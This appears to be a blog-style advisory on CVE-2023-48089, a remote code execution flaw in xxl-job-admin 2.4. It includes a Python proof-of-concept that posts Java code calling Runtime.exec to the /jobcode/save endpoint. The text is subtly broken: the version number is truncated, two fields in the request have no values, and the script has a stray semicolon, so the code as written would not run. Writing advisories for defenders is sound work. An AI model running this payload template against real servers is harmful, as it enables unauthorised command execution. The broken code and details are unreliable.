CVE-2023-48089: XXL-JOB-Admin 2.4. Vulnerable to Remote Code Execution (RCE) via /xxl-job-admin/jobcode/save

The XXL-JOB project is an open-source, lightweight, distributed task scheduling framework, which is widely used in large-scale data migration, system synchronization, report storage, and other scenarios involving complex or time-consuming tasks that require scheduled execution. The admin module of XXL-JOB, xxl-job-admin, is the core component that provides job scheduling, monitoring, and management features.

However, a severe security vulnerability has been discovered in xxl-job-admin version 2.4., identified as CVE-2023-48089. This vulnerability allows attackers to execute arbitrary code remotely on the target system, leading to potentially devastating consequences.

In this post, we'll take a closer look at CVE-2023-48089, including the technical details of the vulnerability, its potential impact, and suggested mitigation strategies.

Overview

CVE-2023-48089 is a Remote Code Execution (RCE) vulnerability that affects the xxl-job-admin version 2.4.. The vulnerability is triggered when an attacker sends a crafted HTTP POST request to the "/xxl-job-admin/jobcode/save" endpoint, which is responsible for storing and managing job code.

In the vulnerable version of xxl-job-admin, user-supplied input in the "code" field of the request can be easily manipulated by attackers, leading to the execution of arbitrary code on the target system.

The core issue stems from the lack of proper input validation and sanitation when the application processes user-supplied data in the "code" field.

Technical Details

The following code snippet demonstrates how the vulnerability can be exploited to execute arbitrary code:

import requests

target_url = "http://example.com/xxl-job-admin/jobcode/save";
data = {
    "id": 1,
    "jobGroup": 1,
    "jobDesc": "test job",
    "author": "attacker",
    "alarmEmail": "",
    "executorRouteStrategy": "First",
    "executorHandler": "demoJobHandler",
    "executorParam": "",
    "executorBlockStrategy": "SERIAL_EXECUTION",
    "executorTimeout": ,
    "logRetentionDays": ,
    "code": "public class DemoJobHandler { public void execute() { Runtime.getRuntime().exec(\"touch /tmp/poc.txt\"); } }"
}

response = requests.post(target_url, data=data)
print(response.status_code)

Original References

1. XXL-Job official repository: https://github.com/xuxueli/xxl-job
2. XXL-Job Admin module: https://github.com/xuxueli/xxl-job/tree/master/xxl-job-admin
3. CVE-2023-48089 vulnerability details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48089

Exploit

To exploit this vulnerability, an attacker needs to craft a malicious payload that includes their desired arbitrary code. The attacker must then send a POST request to the target system's "/xxl-job-admin/jobcode/save" endpoint with the malicious payload.

Once the request is processed by the target system, the attacker's arbitrary code will be executed, potentially enabling them to compromise the system, exfiltrate sensitive data, or disrupt its operation.

Mitigation

To mitigate the risks associated with CVE-2023-48089, users of xxl-job-admin 2.4. are strongly encouraged to upgrade to the latest version as soon as possible. Additionally, administrators should ensure that proper input validation and sanitation measures are in place to prevent the execution of arbitrary code on the target system.

In Conclusion

CVE-2023-48089 is a serious security vulnerability that affects the xxl-job-admin version 2.4.. To protect your systems from potential attacks, we recommend that you upgrade to the latest version and regularly monitor for any updates or security patches.

Timeline

Published on: 11/15/2023 15:15:07 UTC
Last modified on: 11/21/2023 02:37:44 UTC